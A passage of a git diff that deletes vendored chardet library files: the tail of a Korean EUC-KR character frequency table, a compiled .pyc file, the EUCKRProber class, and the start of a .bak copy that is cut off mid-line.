-4447,4448,4449,4450,4451,4452,4453,4454,4455,1359,4456,4457,4458,4459,4460,4461, -4462,4463,4464,4465,1621,4466,4467,4468,4469,4470,4471,4472,4473,4474,4475,4476, -4477,4478,4479,4480,4481,4482,4483,4484,4485,4486,4487,4488,4489,1055,4490,4491, -4492,4493,4494,4495,4496,4497,4498,4499,4500,4501,4502,4503,4504,4505,4506,4507, -4508,4509,4510,4511,4512,4513,4514,4515,4516,4517,4518,1622,4519,4520,4521,1623, -4522,4523,4524,4525,4526,4527,4528,4529,4530,4531,4532,4533,4534,4535,1360,4536, -4537,4538,4539,4540,4541,4542,4543, 975,4544,4545,4546,4547,4548,4549,4550,4551, -4552,4553,4554,4555,4556,4557,4558,4559,4560,4561,4562,4563,4564,4565,4566,4567, -4568,4569,4570,4571,1624,4572,4573,4574,4575,4576,1625,4577,4578,4579,4580,4581, -4582,4583,4584,1626,4585,4586,4587,4588,4589,4590,4591,4592,4593,4594,4595,1627, -4596,4597,4598,4599,4600,4601,4602,4603,4604,4605,4606,4607,4608,4609,4610,4611, -4612,4613,4614,4615,1628,4616,4617,4618,4619,4620,4621,4622,4623,4624,4625,4626, -4627,4628,4629,4630,4631,4632,4633,4634,4635,4636,4637,4638,4639,4640,4641,4642, -4643,4644,4645,4646,4647,4648,4649,1361,4650,4651,4652,4653,4654,4655,4656,4657, -4658,4659,4660,4661,1362,4662,4663,4664,4665,4666,4667,4668,4669,4670,4671,4672, -4673,4674,4675,4676,4677,4678,4679,4680,4681,4682,1629,4683,4684,4685,4686,4687, -1630,4688,4689,4690,4691,1153,4692,4693,4694,1113,4695,4696,4697,4698,4699,4700, -4701,4702,4703,4704,4705,4706,4707,4708,4709,4710,4711,1197,4712,4713,4714,4715, -4716,4717,4718,4719,4720,4721,4722,4723,4724,4725,4726,4727,4728,4729,4730,4731, -4732,4733,4734,4735,1631,4736,1632,4737,4738,4739,4740,4741,4742,4743,4744,1633, -4745,4746,4747,4748,4749,1262,4750,4751,4752,4753,4754,1363,4755,4756,4757,4758, -4759,4760,4761,4762,4763,4764,4765,4766,4767,4768,1634,4769,4770,4771,4772,4773, -4774,4775,4776,4777,4778,1635,4779,4780,4781,4782,4783,4784,4785,4786,4787,4788, -4789,1636,4790,4791,4792,4793,4794,4795,4796,4797,4798,4799,4800,4801,4802,4803, -4804,4805,4806,1637,4807,4808,4809,1638,4810,4811,4812,4813,4814,4815,4816,4817, -4818,1639,4819,4820,4821,4822,4823,4824,4825,4826,4827,4828,4829,4830,4831,4832, -4833,1077,4834,4835,4836,4837,4838,4839,4840,4841,4842,4843,4844,4845,4846,4847, -4848,4849,4850,4851,4852,4853,4854,4855,4856,4857,4858,4859,4860,4861,4862,4863, -4864,4865,4866,4867,4868,4869,4870,4871,4872,4873,4874,4875,4876,4877,4878,4879, -4880,4881,4882,4883,1640,4884,4885,1641,4886,4887,4888,4889,4890,4891,4892,4893, -4894,4895,4896,4897,4898,4899,4900,4901,4902,4903,4904,4905,4906,4907,4908,4909, -4910,4911,1642,4912,4913,4914,1364,4915,4916,4917,4918,4919,4920,4921,4922,4923, -4924,4925,4926,4927,4928,4929,4930,4931,1643,4932,4933,4934,4935,4936,4937,4938, -4939,4940,4941,4942,4943,4944,4945,4946,4947,4948,4949,4950,4951,4952,4953,4954, -4955,4956,4957,4958,4959,4960,4961,4962,4963,4964,4965,4966,4967,4968,4969,4970, -4971,4972,4973,4974,4975,4976,4977,4978,4979,4980,1644,4981,4982,4983,4984,1645, -4985,4986,1646,4987,4988,4989,4990,4991,4992,4993,4994,4995,4996,4997,4998,4999, -5000,5001,5002,5003,5004,5005,1647,5006,1648,5007,5008,5009,5010,5011,5012,1078, -5013,5014,5015,5016,5017,5018,5019,5020,5021,5022,5023,5024,5025,5026,5027,5028, -1365,5029,5030,5031,5032,5033,5034,5035,5036,5037,5038,5039,1649,5040,5041,5042, -5043,5044,5045,1366,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,1650,5056, -5057,5058,5059,5060,5061,5062,5063,5064,5065,5066,5067,5068,5069,5070,5071,5072, -5073,5074,5075,5076,5077,1651,5078,5079,5080,5081,5082,5083,5084,5085,5086,5087, -5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102,5103, -5104,5105,5106,5107,5108,5109,5110,1652,5111,5112,5113,5114,5115,5116,5117,5118, -1367,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,1653,5130,5131,5132, -5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148, -5149,1368,5150,1654,5151,1369,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161, -5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177, -5178,1370,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192, -5193,5194,5195,5196,5197,5198,1655,5199,5200,5201,5202,1656,5203,5204,5205,5206, -1371,5207,1372,5208,5209,5210,5211,1373,5212,5213,1374,5214,5215,5216,5217,5218, -5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234, -5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,1657,5248,5249, -5250,5251,1658,1263,5252,5253,5254,5255,5256,1375,5257,5258,5259,5260,5261,5262, -5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278, -5279,5280,5281,5282,5283,1659,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293, -5294,5295,5296,5297,5298,5299,5300,1660,5301,5302,5303,5304,5305,5306,5307,5308, -5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,1376,5322,5323, -5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,1198,5334,5335,5336,5337,5338, -5339,5340,5341,5342,5343,1661,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353, -5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369, -5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385, -5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,1264,5399,5400, -5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,1662,5413,5414,5415, -5416,1663,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430, -5431,5432,5433,5434,5435,5436,5437,5438,1664,5439,5440,5441,5442,5443,5444,5445, -5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461, -5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477, -5478,1154,5479,5480,5481,5482,5483,5484,5485,1665,5486,5487,5488,5489,5490,5491, -5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507, -5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523, -5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539, -5540,5541,5542,5543,5544,5545,5546,5547,5548,1377,5549,5550,5551,5552,5553,5554, -5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570, -1114,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585, -5586,5587,5588,5589,5590,5591,5592,1378,5593,5594,5595,5596,5597,5598,5599,5600, -5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,1379,5615, -5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631, -5632,5633,5634,1380,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646, -5647,5648,5649,1381,1056,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660, -1666,5661,5662,5663,5664,5665,5666,5667,5668,1667,5669,1668,5670,5671,5672,5673, -5674,5675,5676,5677,5678,1155,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688, -5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,1669,5699,5700,5701,5702,5703, -5704,5705,1670,5706,5707,5708,5709,5710,1671,5711,5712,5713,5714,1382,5715,5716, -5717,5718,5719,5720,5721,5722,5723,5724,5725,1672,5726,5727,1673,1674,5728,5729, -5730,5731,5732,5733,5734,5735,5736,1675,5737,5738,5739,5740,5741,5742,5743,5744, -1676,5745,5746,5747,5748,5749,5750,5751,1383,5752,5753,5754,5755,5756,5757,5758, -5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,1677,5769,5770,5771,5772,5773, -1678,5774,5775,5776, 998,5777,5778,5779,5780,5781,5782,5783,5784,5785,1384,5786, -5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,1679,5801, -5802,5803,1115,1116,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815, -5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831, -5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847, -5848,5849,5850,5851,5852,5853,5854,5855,1680,5856,5857,5858,5859,5860,5861,5862, -5863,5864,1681,5865,5866,5867,1682,5868,5869,5870,5871,5872,5873,5874,5875,5876, -5877,5878,5879,1683,5880,1684,5881,5882,5883,5884,1685,5885,5886,5887,5888,5889, -5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905, -5906,5907,1686,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, -5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,1687, -5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951, -5952,1688,1689,5953,1199,5954,5955,5956,5957,5958,5959,5960,5961,1690,5962,5963, -5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979, -5980,5981,1385,5982,1386,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993, -5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6008,6009, -6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020,6021,6022,6023,6024,6025, -6026,6027,1265,6028,6029,1691,6030,6031,6032,6033,6034,6035,6036,6037,6038,6039, -6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052,6053,6054,6055, -6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068,6069,6070,6071, -6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084,1692,6085,6086, -6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100,6101,6102, -6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116,6117,6118, -6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,1693,6132,6133, -6134,6135,6136,1694,6137,6138,6139,6140,6141,1695,6142,6143,6144,6145,6146,6147, -6148,6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163, -6164,6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179, -6180,6181,6182,6183,6184,6185,1696,6186,6187,6188,6189,6190,6191,6192,6193,6194, -6195,6196,6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210, -6211,6212,6213,6214,6215,6216,6217,6218,6219,1697,6220,6221,6222,6223,6224,6225, -6226,6227,6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241, -6242,6243,6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,1698,6254,6255,6256, -6257,6258,6259,6260,6261,6262,6263,1200,6264,6265,6266,6267,6268,6269,6270,6271, #1024 -6272,6273,6274,6275,6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,6286,6287, -6288,6289,6290,6291,6292,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,1699, -6303,6304,1700,6305,6306,6307,6308,6309,6310,6311,6312,6313,6314,6315,6316,6317, -6318,6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333, -6334,6335,6336,6337,6338,6339,1701,6340,6341,6342,6343,6344,1387,6345,6346,6347, -6348,6349,6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363, -6364,6365,6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379, -6380,6381,6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395, -6396,6397,6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,6411, -6412,6413,1702,6414,6415,6416,6417,6418,6419,6420,6421,6422,1703,6423,6424,6425, -6426,6427,6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,1704,6439,6440, -6441,6442,6443,6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,6455,6456, -6457,6458,6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472, -6473,6474,6475,6476,6477,6478,6479,6480,6481,6482,6483,6484,6485,6486,6487,6488, -6489,6490,6491,6492,6493,6494,6495,6496,6497,6498,6499,6500,6501,6502,6503,1266, -6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516,6517,6518,6519, -6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532,6533,6534,6535, -6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548,6549,6550,6551, -1705,1706,6552,6553,6554,6555,6556,6557,6558,6559,6560,6561,6562,6563,6564,6565, -6566,6567,6568,6569,6570,6571,6572,6573,6574,6575,6576,6577,6578,6579,6580,6581, -6582,6583,6584,6585,6586,6587,6588,6589,6590,6591,6592,6593,6594,6595,6596,6597, -6598,6599,6600,6601,6602,6603,6604,6605,6606,6607,6608,6609,6610,6611,6612,6613, -6614,6615,6616,6617,6618,6619,6620,6621,6622,6623,6624,6625,6626,6627,6628,6629, -6630,6631,6632,6633,6634,6635,6636,6637,1388,6638,6639,6640,6641,6642,6643,6644, -1707,6645,6646,6647,6648,6649,6650,6651,6652,6653,6654,6655,6656,6657,6658,6659, -6660,6661,6662,6663,1708,6664,6665,6666,6667,6668,6669,6670,6671,6672,6673,6674, -1201,6675,6676,6677,6678,6679,6680,6681,6682,6683,6684,6685,6686,6687,6688,6689, -6690,6691,6692,6693,6694,6695,6696,6697,6698,6699,6700,6701,6702,6703,6704,6705, -6706,6707,6708,6709,6710,6711,6712,6713,6714,6715,6716,6717,6718,6719,6720,6721, -6722,6723,6724,6725,1389,6726,6727,6728,6729,6730,6731,6732,6733,6734,6735,6736, -1390,1709,6737,6738,6739,6740,6741,6742,1710,6743,6744,6745,6746,1391,6747,6748, -6749,6750,6751,6752,6753,6754,6755,6756,6757,1392,6758,6759,6760,6761,6762,6763, -6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777,6778,6779, -6780,1202,6781,6782,6783,6784,6785,6786,6787,6788,6789,6790,6791,6792,6793,6794, -6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806,6807,6808,6809,1711, -6810,6811,6812,6813,6814,6815,6816,6817,6818,6819,6820,6821,6822,6823,6824,6825, -6826,6827,6828,6829,6830,6831,6832,6833,6834,6835,6836,1393,6837,6838,6839,6840, -6841,6842,6843,6844,6845,6846,6847,6848,6849,6850,6851,6852,6853,6854,6855,6856, -6857,6858,6859,6860,6861,6862,6863,6864,6865,6866,6867,6868,6869,6870,6871,6872, -6873,6874,6875,6876,6877,6878,6879,6880,6881,6882,6883,6884,6885,6886,6887,6888, -6889,6890,6891,6892,6893,6894,6895,6896,6897,6898,6899,6900,6901,6902,1712,6903, -6904,6905,6906,6907,6908,6909,6910,1713,6911,6912,6913,6914,6915,6916,6917,6918, -6919,6920,6921,6922,6923,6924,6925,6926,6927,6928,6929,6930,6931,6932,6933,6934, -6935,6936,6937,6938,6939,6940,6941,6942,6943,6944,6945,6946,6947,6948,6949,6950, -6951,6952,6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966, -6967,6968,6969,6970,6971,6972,6973,6974,1714,6975,6976,6977,6978,6979,6980,6981, -6982,6983,6984,6985,6986,6987,6988,1394,6989,6990,6991,6992,6993,6994,6995,6996, -6997,6998,6999,7000,1715,7001,7002,7003,7004,7005,7006,7007,7008,7009,7010,7011, -7012,7013,7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027, -7028,1716,7029,7030,7031,7032,7033,7034,7035,7036,7037,7038,7039,7040,7041,7042, -7043,7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058, -7059,7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,7071,7072,7073,7074, -7075,7076,7077,7078,7079,7080,7081,7082,7083,7084,7085,7086,7087,7088,7089,7090, -7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105,7106, -7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,7119,7120,7121,7122, -7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136,7137,7138, -7139,7140,7141,7142,7143,7144,7145,7146,7147,7148,7149,7150,7151,7152,7153,7154, -7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167,7168,7169,7170, -7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183,7184,7185,7186, -7187,7188,7189,7190,7191,7192,7193,7194,7195,7196,7197,7198,7199,7200,7201,7202, -7203,7204,7205,7206,7207,1395,7208,7209,7210,7211,7212,7213,1717,7214,7215,7216, -7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229,7230,7231,7232, -7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245,7246,7247,7248, -7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261,7262,7263,7264, -7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277,7278,7279,7280, -7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293,7294,7295,7296, -7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308,7309,7310,7311,7312, -7313,1718,7314,7315,7316,7317,7318,7319,7320,7321,7322,7323,7324,7325,7326,7327, -7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339,7340,7341,7342,7343, -7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,7354,7355,7356,7357,7358,7359, -7360,7361,7362,7363,7364,7365,7366,7367,7368,7369,7370,7371,7372,7373,7374,7375, -7376,7377,7378,7379,7380,7381,7382,7383,7384,7385,7386,7387,7388,7389,7390,7391, -7392,7393,7394,7395,7396,7397,7398,7399,7400,7401,7402,7403,7404,7405,7406,7407, -7408,7409,7410,7411,7412,7413,7414,7415,7416,7417,7418,7419,7420,7421,7422,7423, -7424,7425,7426,7427,7428,7429,7430,7431,7432,7433,7434,7435,7436,7437,7438,7439, -7440,7441,7442,7443,7444,7445,7446,7447,7448,7449,7450,7451,7452,7453,7454,7455, -7456,7457,7458,7459,7460,7461,7462,7463,7464,7465,7466,7467,7468,7469,7470,7471, -7472,7473,7474,7475,7476,7477,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487, -7488,7489,7490,7491,7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,7503, -7504,7505,7506,7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519, -7520,7521,7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535, -7536,7537,7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,7550,7551, -7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, -7568,7569,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582,7583, -7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598,7599, -7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614,7615, -7616,7617,7618,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628,7629,7630,7631, -7632,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643,7644,7645,7646,7647, -7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659,7660,7661,7662,7663, -7664,7665,7666,7667,7668,7669,7670,7671,7672,7673,7674,7675,7676,7677,7678,7679, -7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690,7691,7692,7693,7694,7695, -7696,7697,7698,7699,7700,7701,7702,7703,7704,7705,7706,7707,7708,7709,7710,7711, -7712,7713,7714,7715,7716,7717,7718,7719,7720,7721,7722,7723,7724,7725,7726,7727, -7728,7729,7730,7731,7732,7733,7734,7735,7736,7737,7738,7739,7740,7741,7742,7743, -7744,7745,7746,7747,7748,7749,7750,7751,7752,7753,7754,7755,7756,7757,7758,7759, -7760,7761,7762,7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775, -7776,7777,7778,7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791, -7792,7793,7794,7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,7806,7807, -7808,7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823, -7824,7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839, -7840,7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855, -7856,7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871, -7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887, -7888,7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903, -7904,7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919, -7920,7921,7922,7923,7924,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, -7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, -7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, -7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, -7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, -8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, -8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, -8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, -8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, -8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, -8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, -8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, -8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, -8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, -8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, -8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, -8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, -8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, -8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, -8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, -8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, -8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271, -8272,8273,8274,8275,8276,8277,8278,8279,8280,8281,8282,8283,8284,8285,8286,8287, -8288,8289,8290,8291,8292,8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303, -8304,8305,8306,8307,8308,8309,8310,8311,8312,8313,8314,8315,8316,8317,8318,8319, -8320,8321,8322,8323,8324,8325,8326,8327,8328,8329,8330,8331,8332,8333,8334,8335, -8336,8337,8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351, -8352,8353,8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,8364,8365,8366,8367, -8368,8369,8370,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382,8383, -8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398,8399, -8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,8411,8412,8413,8414,8415, -8416,8417,8418,8419,8420,8421,8422,8423,8424,8425,8426,8427,8428,8429,8430,8431, -8432,8433,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443,8444,8445,8446,8447, -8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459,8460,8461,8462,8463, -8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475,8476,8477,8478,8479, -8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8494,8495, -8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511, -8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522,8523,8524,8525,8526,8527, -8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538,8539,8540,8541,8542,8543, -8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554,8555,8556,8557,8558,8559, -8560,8561,8562,8563,8564,8565,8566,8567,8568,8569,8570,8571,8572,8573,8574,8575, -8576,8577,8578,8579,8580,8581,8582,8583,8584,8585,8586,8587,8588,8589,8590,8591, -8592,8593,8594,8595,8596,8597,8598,8599,8600,8601,8602,8603,8604,8605,8606,8607, -8608,8609,8610,8611,8612,8613,8614,8615,8616,8617,8618,8619,8620,8621,8622,8623, -8624,8625,8626,8627,8628,8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,8639, -8640,8641,8642,8643,8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655, -8656,8657,8658,8659,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671, -8672,8673,8674,8675,8676,8677,8678,8679,8680,8681,8682,8683,8684,8685,8686,8687, -8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, -8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719, -8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735, -8736,8737,8738,8739,8740,8741) diff --git a/chardet/chardet/euckrfreq.pyc b/chardet/chardet/euckrfreq.pyc deleted file mode 100644 index 2b7c2c4..0000000 Binary files a/chardet/chardet/euckrfreq.pyc and /dev/null differ diff --git a/chardet/chardet/euckrprober.py b/chardet/chardet/euckrprober.py deleted file mode 100644 index 2b9ba77..0000000 --- a/chardet/chardet/euckrprober.py +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import EUCKRDistributionAnalysis -from .mbcssm import EUCKRSMModel - -class EUCKRProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCKRSMModel) - self._mDistributionAnalyzer = EUCKRDistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "EUC-KR" diff --git a/chardet/chardet/euckrprober.py.bak b/chardet/chardet/euckrprober.py.bak deleted file mode 100644 index bd697eb..0000000 --- a/chardet/chardet/euckrprober.py.bak +++ /dev/null @@ -1,41 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin 